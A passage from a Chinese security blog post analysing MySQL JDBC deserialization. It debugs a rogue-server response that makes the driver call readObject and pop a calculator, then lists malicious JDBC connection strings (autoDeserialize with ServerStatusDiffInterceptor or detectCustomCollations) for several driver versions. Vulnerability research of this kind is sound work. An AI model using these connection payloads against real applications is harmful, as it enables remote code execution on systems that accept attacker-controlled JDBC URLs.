的布尔类型属性（表示是否开启自动反序列化功能）。</span><br><span class="hljs-comment"></span><br><span class="hljs-comment">.getValue()</span><br><span class="hljs-comment"> 获取该属性的实际值（true 或 false）。</span><br><span class="hljs-comment"></span><br><span class="hljs-comment">if (...)</span><br><span class="hljs-comment"> 如果 autoDeserialize 的值为 true（即开启了自动反序列化），则执行下面的代码块。</span><br><span class="hljs-comment"></span><br><span class="hljs-comment">Object obj = data;</span><br><span class="hljs-comment"> 定义一个对象变量 obj，并让它的初始值等于 data（通常是一个字节数组）</span><br><span class="hljs-comment"> **/</span><br></code></pre></td></tr></table></figure>

<p>继续跟进</p>
<p>找到了我们没有弹出计算器的真正原因</p>
<p>data[0] &#x3D;&#x3D; -84返回为false，无法执行readObject方法</p>
<p><img src="/img/jdbc/j15.png" srcset="/img/loading.gif" lazyload></p>
<p>总之是我们发送的SHOW SESSION STATUS响应包有点问题，这里不再新生成了，直接用一个写好的</p>
<p>顺利弹出计算器</p>
<p><img src="/img/jdbc/j16.png" srcset="/img/loading.gif" lazyload></p>
<p>之前是使用</p>
<p>ysoserial直接生成payload写入文件再读取出来构造响应包的poc，应该是构造响应包poc这里有一些问题</p>
<p>这次用能成功执行的继续调试查看</p>
<p>这次的data就没有问题了</p>
<p><img src="/img/jdbc/j17.png" srcset="/img/loading.gif" lazyload></p>
<p>继续执行程序就是会调用readObject方法，触发反序列化漏洞，弹出计算器</p>
<p><img src="/img/jdbc/j18.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="不同-MySQL-JDBC-Driver-的-payload"><a href="#不同-MySQL-JDBC-Driver-的-payload" class="headerlink" title="不同 MySQL-JDBC-Driver 的 payload"></a>不同 MySQL-JDBC-Driver 的 payload</h2><h3 id="8-x"><a href="#8-x" class="headerlink" title="8.x"></a>8.x</h3><p>如上述 Demo：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-string">&quot;jdbc:mysql://127.0.0.1:3309/test?characterEncoding=UTF-8&amp;serverTimezone=Asia/Shanghai&quot;</span> +  <br>        <span class="hljs-string">&quot;&amp;autoDeserialize=true&quot;</span> +  <br>    <span class="hljs-string">&quot;&amp;queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&quot;</span>;<br></code></pre></td></tr></table></figure>

<h3 id="6-x"><a href="#6-x" class="headerlink" title="6.x"></a>6.x</h3><p>属性名不同，queryInterceptors 换为 statementInterceptors</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs java">jdbc:mysql:<span class="hljs-comment">//x.x.x.x:3306/test?autoDeserialize=true&amp;statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor</span><br></code></pre></td></tr></table></figure>

<h3 id="5-1-11"><a href="#5-1-11" class="headerlink" title="&gt;&#x3D;5.1.11"></a>&gt;&#x3D;5.1.11</h3><p>包名中没有cj</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs java">jdbc:mysql:<span class="hljs-comment">//x.x.x.x:3306/test?autoDeserialize=true&amp;statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor</span><br></code></pre></td></tr></table></figure>

<h3 id="5-x"><a href="#5-x" class="headerlink" title="5.x &lt;&#x3D; 5.1.10"></a>5.x &lt;&#x3D; 5.1.10</h3><p>同上，但需要连接后执行查询。</p>
<h3 id="5-1-29-5-1-40"><a href="#5-1-29-5-1-40" class="headerlink" title="5.1.29 - 5.1.40"></a>5.1.29 - 5.1.40</h3><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs java">jdbc:mysql:<span class="hljs-comment">//x.x.x.x:3306/test?detectCustomCollations=true&amp;autoDeserialize=true</span><br></code></pre></td></tr></table></figure>

<h3 id="5-1-28-5-1-19"><a href="#5-1-28-5-1-19" class="headerlink" title="5.1.28 - 5.1.19"></a>5.1.28 - 5.1.19</h3><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs java">jdbc:mysql:<span class="hljs-comment">//127.0.0.1:3306/test?autoDeserialize=true</span><br></code></pre></td></tr></table></figure>


                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/Java%E5%AE%89%E5%85%A8/" class="category-chain-item">Java安全</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/Java%E5%AE%89%E5%85%A8/" class="print-no-link">#Java安全</a>
      
        <a href="/tags/JDBC/" class="print-no-link">#JDBC</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>Java安全-JDBC反序列化分析</div>
      <div>http://huang-d1.github.io/2025/10/29/Java安全-JDBC反序列化分析/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>huangdi</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年10月29日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/12/10/ThinkPHP5%20RCE%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E4%B8%8E%E5%88%86%E6%9E%90/" title="ThinkPHP5 RCE漏洞复现与分析">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">ThinkPHP5 RCE漏洞复现与分析</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/10/27/Java%E5%AE%89%E5%85%A8-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%B3%A8%E5%85%A5%E5%86%85%E5%AD%98%E9%A9%AC/" title="Java安全-反序列化注入内存马">
                        <span class="hidden-mobile">Java安全-反序列化注入内存马</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://Hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://huang-d1.github.io" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
